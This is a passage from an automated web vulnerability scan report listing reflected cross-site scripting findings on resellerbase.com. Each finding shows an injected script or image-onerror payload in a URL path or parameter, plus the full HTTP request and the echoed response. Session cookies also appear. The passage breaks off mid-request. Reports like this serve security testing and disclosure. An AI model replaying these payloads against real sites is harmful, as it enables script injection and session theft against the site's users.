<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=S?d2760<script>alert(1)</script>e6daf3e9bb9=1 was not found on this server.</p>
...[SNIP]...

2.4737. http://www.resellerbase.com/tags.php&ltr=T [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=T

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e4cf<script>alert(1)</script>172edfee609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php7e4cf<script>alert(1)</script>172edfee609&ltr=T HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php7e4cf<script>alert(1)</script>172edfee609&ltr=T was not found on this server.</p>
...[SNIP]...

2.4738. http://www.resellerbase.com/tags.php&ltr=T [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=T

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cd88<script>alert(1)</script>3be4f8af5bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=T?6cd88<script>alert(1)</script>3be4f8af5bc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=T?6cd88<script>alert(1)</script>3be4f8af5bc=1 was not found on this server.</p>
...[SNIP]...

2.4739. http://www.resellerbase.com/tags.php&ltr=U [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=U

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c951f<script>alert(1)</script>07ce89bfc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc951f<script>alert(1)</script>07ce89bfc9&ltr=U HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc951f<script>alert(1)</script>07ce89bfc9&ltr=U was not found on this server.</p>
...[SNIP]...

2.4740. http://www.resellerbase.com/tags.php&ltr=U [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=U

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39fc7<script>alert(1)</script>8ca781e8c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=U?39fc7<script>alert(1)</script>8ca781e8c52=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=U?39fc7<script>alert(1)</script>8ca781e8c52=1 was not found on this server.</p>
...[SNIP]...

2.4741. http://www.resellerbase.com/tags.php&ltr=V [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=V

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6e02<script>alert(1)</script>2848be69218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa6e02<script>alert(1)</script>2848be69218&ltr=V HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa6e02<script>alert(1)</script>2848be69218&ltr=V was not found on this server.</p>
...[SNIP]...

2.4742. http://www.resellerbase.com/tags.php&ltr=V [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=V

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd9ce<script>alert(1)</script>2c7e83b3d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=V?cd9ce<script>alert(1)</script>2c7e83b3d81=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=V?cd9ce<script>alert(1)</script>2c7e83b3d81=1 was not found on this server.</p>
...[SNIP]...

2.4743. http://www.resellerbase.com/tags.php&ltr=W [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=W

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83bfe<script>alert(1)</script>35c446f69b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php83bfe<script>alert(1)</script>35c446f69b6&ltr=W HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php83bfe<script>alert(1)</script>35c446f69b6&ltr=W was not found on this server.</p>
...[SNIP]...

2.4744. http://www.resellerbase.com/tags.php&ltr=W [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=W

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 27ce2<script>alert(1)</script>779f4c60000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=W?27ce2<script>alert(1)</script>779f4c60000=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=W?27ce2<script>alert(1)</script>779f4c60000=1 was not found on this server.</p>
...[SNIP]...

2.4745. http://www.resellerbase.com/tags.php&ltr=X [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=X

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61c15<script>alert(1)</script>74aeb8166dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php61c15<script>alert(1)</script>74aeb8166dc&ltr=X HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php61c15<script>alert(1)</script>74aeb8166dc&ltr=X was not found on this server.</p>
...[SNIP]...

2.4746. http://www.resellerbase.com/tags.php&ltr=X [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=X

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60e79<script>alert(1)</script>01de3505404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=X?60e79<script>alert(1)</script>01de3505404=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=X?60e79<script>alert(1)</script>01de3505404=1 was not found on this server.</p>
...[SNIP]...

2.4747. http://www.resellerbase.com/tags.php&ltr=Y [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Y

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a991b<script>alert(1)</script>30deb712985 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa991b<script>alert(1)</script>30deb712985&ltr=Y HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa991b<script>alert(1)</script>30deb712985&ltr=Y was not found on this server.</p>
...[SNIP]...

2.4748. http://www.resellerbase.com/tags.php&ltr=Y [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Y

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5ecf<script>alert(1)</script>bc3a5f7dbbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Y?a5ecf<script>alert(1)</script>bc3a5f7dbbb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Y?a5ecf<script>alert(1)</script>bc3a5f7dbbb=1 was not found on this server.</p>
...[SNIP]...

2.4749. http://www.resellerbase.com/tags.php&ltr=Z [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Z

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88e74<script>alert(1)</script>327338d7f0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php88e74<script>alert(1)</script>327338d7f0f&ltr=Z HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php88e74<script>alert(1)</script>327338d7f0f&ltr=Z was not found on this server.</p>
...[SNIP]...

2.4750. http://www.resellerbase.com/tags.php&ltr=Z [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=Z

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38ecc<script>alert(1)</script>29f298f06c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Z?38ecc<script>alert(1)</script>29f298f06c4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Z?38ecc<script>alert(1)</script>29f298f06c4=1 was not found on this server.</p>
...[SNIP]...

2.4751. http://www.resellerbase.com/tell_friend.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd7d8<script>alert(1)</script>25be0f5e43e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tell_friend.phpfd7d8<script>alert(1)</script>25be0f5e43e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.phpfd7d8<script>alert(1)</script>25be0f5e43e was not found on this server.</p>
...[SNIP]...

2.4752. http://www.resellerbase.com/tell_friend.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31dab<script>alert(1)</script>7d835201c987dc901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php31dab<script>alert(1)</script>7d835201c987dc901?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.php31dab<script>alert(1)</script>7d835201c987dc901?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com was not found on this server.</p>
...[SNIP]...

2.4753. http://www.resellerbase.com/tell_friend.php [friend_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the friend_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b216"><img%20src%3da%20onerror%3dalert(1)>83f3a7e868dbe4f2a was submitted in the friend_email parameter. This input was echoed as 4b216"><img src=a onerror=alert(1)>83f3a7e868dbe4f2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com4b216"><img%20src%3da%20onerror%3dalert(1)>83f3a7e868dbe4f2a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="friend_email" value="wiener@example.com4b216"><img src=a onerror=alert(1)>83f3a7e868dbe4f2a" />
...[SNIP]...

2.4754. http://www.resellerbase.com/tell_friend.php [friend_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the friend_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23961"><img%20src%3da%20onerror%3dalert(1)>896342a7ab9fe7299 was submitted in the friend_name parameter. This input was echoed as 23961"><img src=a onerror=alert(1)>896342a7ab9fe7299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener23961"><img%20src%3da%20onerror%3dalert(1)>896342a7ab9fe7299&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="friend_name" value="Peter Wiener23961"><img src=a onerror=alert(1)>896342a7ab9fe7299" />
...[SNIP]...

2.4755. http://www.resellerbase.com/tell_friend.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50a4"><img%20src%3da%20onerror%3dalert(1)>ab291645ea527fdd0 was submitted in the id parameter. This input was echoed as d50a4\"><img src=a onerror=alert(1)>ab291645ea527fdd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?id=d50a4"><img%20src%3da%20onerror%3dalert(1)>ab291645ea527fdd0&captcha_key=555-555-0199@example.com&my_email=wiener@example.com&fav=&pflag=tf&friend_name=Peter+Wiener&submit=Tell+My+Friend&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
